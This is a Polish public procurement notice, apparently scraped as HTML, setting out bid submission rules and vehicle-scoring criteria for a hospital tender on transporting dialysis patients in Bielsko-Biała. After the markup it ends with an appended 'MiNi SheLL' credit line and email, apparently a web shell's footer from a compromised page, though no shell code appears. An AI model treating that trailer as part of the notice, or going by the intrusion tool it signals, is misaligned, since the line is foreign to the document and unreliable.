<b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">I. ZŁOŻENIE OFERTY I OPIS SPOSOBU JEJ PRZYGOTOWANIA 1. Oferta oraz oświadczenia, októrych mowa w siwz w Sekcji III.3) oraz III.7 ust 2 pkt 2) i 3) muszą być złożone, pod rygoremnieważności, w formie pisemnej. 2. Oferta musi być sporządzona w języku polskim, przyuwzględnieniu regulacji zawartych w ustawie z dnia 7 października 1999 r. o języku polskim (t. j. Dz.U. z 2018r. poz. 931 ze zm.) i podpisana przez osobę (osoby) upoważnione do reprezentowaniaWykonawcy, zgodnie z dokumentem potwierdzającym posiadanie uprawnień do występowania wobrocie prawnym lub udzielonym pełnomocnictwem. 3. Wszelkie poprawki lub zmiany w tekścieoferty muszą być parafowane przez osobę podpisującą ofertę z tym zastrzeżeniem, że naniesieniezmian lub skreśleń w formularzu ofertowym oraz innych formularzach i projekcie umowy, będącychzałącznikami do siwz, w miejscach do tego nieprzeznaczonych tj., gdy formularz nie przewidujewyboru (wariantów) lub uzupełnienia (wypełnienia) treści, skutkować będzie odrzuceniem oferty, zzastrzeżeniem zmian wynikających z modyfikacji siwz dokonanej przez Zamawiającego, jeżeli takiewystępują. 4. Ofertę wraz ze wszystkimi wymaganymi oświadczeniami i dokumentami dołączonymido oferty, należy umieścić w nieprzezroczystej, zapieczętowanej kopercie, opatrzonej danymiWykonawcy (pełna nazwa i dokładny adres Wykonawcy) oraz napisem: Oferta w postępowaniu pod nazwą ,,Realizacja usług transportowych w zakresie przewozu osób dializowanych dla SzpitalaWojewódzkiego w Bielsku-Białej" - nr referencyjny 33/19 5. Niewłaściwe oznakowanie koperty możebyć przyczyną otwarcia jej przed upływem terminu składania ofert. W takim przypadku oferta zostaniepotraktowana jako oferta handlowa, a nie oferta w rozumieniu ustawy pzp i nie będzie brana poduwagę w chwili otwarcia ofert w niniejszym postępowaniu. W przypadku wysłania koperty kurieremna opakowaniu firmy kurierskiej należy bezwzględnie umieścić informację, że jest to: Oferta wpostępowaniu pod nazwą ,,Realizacja usług transportowych w zakresie przewozu osób dializowanychdla Szpitala Wojewódzkiego w Bielsku-Białej" - nr referencyjny 33/19. 6. Wykonawca, nie późniejniż w terminie składania ofert, może zastrzec, że wskazane przez niego informacje stanowiącetajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, nie mogąbyć udostępniane innym uczestnikom postępowania, z zastrzeżeniem informacji, o których mowa wart. 86 ust. 4 ustawy pzp. Wykonawca musi wykazać, iż zastrzeżone informacje stanowią tajemnicęprzedsiębiorstwa. 7. W przypadku, gdyby oferta zawierała informacje stanowiące tajemnicęprzedsiębiorstwa, o których mowa powyżej, Wykonawca winien w sposób nie budzący wątpliwościzastrzec, które z zawartych informacji stanowią tajemnicę przedsiębiorstwa i oznaczyć je klauzulą:,,Dokumenty zastrzeżone - tajemnica przedsiębiorstwa". Zaleca się wydzielenie tych informacji wzłożonej ofercie. 8. Wykonawca może wprowadzić zmiany lub wycofać złożoną przez siebie ofertę przed upływem terminu składania ofert. 9. Zmiany złożonej oferty muszą być złożone w miejscu iwedług zasad obowiązujących przy składaniu ofert. Kopertę zawierającą zmiany oferty należydodatkowo opatrzyć dopiskiem ,,ZMIANA". 10. Wycofanie złożonej oferty następuje poprzez złożeniepisemnego powiadomienia podpisanego przez osobę (osoby) upoważnione do reprezentowaniaWykonawcy, zgodnie z dokumentem potwierdzającym posiadanie uprawnień do występowania wobrocie prawnym lub udzielonym pełnomocnictwem złożonym w formie oryginału lub kopiipoświadczonej za zgodność z oryginałem przez notariusza. Powiadomienie należy złożyć w miejscu iwedług zasad obowiązujących przy składaniu ofert. Kopertę zawierającą powiadomienie należydodatkowo opatrzyć dopiskiem ,,WYCOFANIE". 11. Wykonawca nie może wycofać oferty iwprowadzić zmian w ofercie po upływie terminu składania ofert. 12. Zamawiający niezwłocznie zwróci ofertę, która została złożona po terminie. Oferty, które zostanądostarczone do siedziby zamawiającego w stanie uszkodzonym, wskazującym na możliwość zapoznania się z zawartością nie będą dopuszczone do publicznego otwarcia ofert i zostanąniezwłocznie zwrócone wykonawcy bez rozpatrzenia. II. FORMA, W JAKIEJ OŚWIADCZENIA IDOKUMENTY MUSZĄ BYĆ SKŁADANE (NIE DOTYCZY SKŁADANIA OFERT) 1. Dokumenty lub oświadczenia, wymienione w Rozdziale IX siwz, składane są w oryginale lub w kopiipoświadczonej za zgodność z oryginałem, za pośrednictwem operatora pocztowego w rozumieniuustawy - Prawo pocztowe, osobiście lub pośrednictwem posłańca. 2. Poświadczenie za zgodność zoryginałem następuje przez opatrzenie kopii dokumentu lub kopii oświadczenia sporządzonych wpostaci papierowej, własnoręcznym podpisem. 3. Sposób sporządzenia oświadczeń i dokumentówmusi być zgodny z wymaganiami określonymi w rozporządzeniu Ministra Rozwoju z dnia 26 lipca2016 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy wpostępowaniu o udzielenie zamówienia (Dz. U z 2016r. poz. 1126 ze zm.). 4. Wnioski o wyjaśnienietreści siwz przekazywane są za pośrednictwem operatora pocztowego w rozumieniu ustawy - Prawopocztowe, osobiście, za pośrednictwem posłańca, faksu lub przy użyciu środków komunikacjielektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną -na adres e-mail: przetargi@hospital.com.pl, zaleca się aby wnioski, o których mowa powyżejprzekazywane były również w wersji edytowalnych plików. Maksymalny rozmiar plikówprzesyłanych za pomocą poczty elektronicznej wynosi 10MB. III. Metoda oceny kryterium "środkitransportu" odbywać się będzie na podstawie wykazu pojazdów, o którym mowa w Załączniku Nr 1 do siwz ,,Formularz ofertowy" ust. 5, według niżej przedstawionej punktacji: Parametr 1. Ilość pojazdówwykazanych w wykazie Punktacja 5 pojazdów - 0 pkt. 6 pojazdów i więcej - 10 pkt. Parametr 2. Rokprodukcji każdego pojazdu wykazanego w wykazie nie wcześniej niż w 2010r. Punktacja Niewcześniej niż w 2010r. - 0 pkt. Nie wcześniej niż w 2010r., w tym 3 pojazdy i więcej wyprodukowanenie wcześniej niż w 2016r. - 15 pkt Parametr 3. Dwa pojazdy wykazane w wykazie przystosowane doprzewozu osób w pozycji leżącej na noszach i na wózku inwalidzkim. Pojazdy te muszą byćwyposażone w nosze o nośności do 250 kg, natomiast osoby poruszające się na wózku inwalidzkimmuszą być transportowane na wózku inwalidzkim będącym na wyposażeniu pojazdu - wózek musiposiadać mocowanie uniemożliwiające przemieszczanie wózka inwalidzkiego w pojeździe w trakciejazdy Punktacja 2 pojazdy przystosowane do przewozu osób w pozycji leżącej na noszach i na wózkuinwalidzkim - 0 pkt. 3 pojazdy i więcej przystosowane do przewozu osób w pozycji leżącej nanoszach i na wózku inwalidzkim - 15 pkt.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com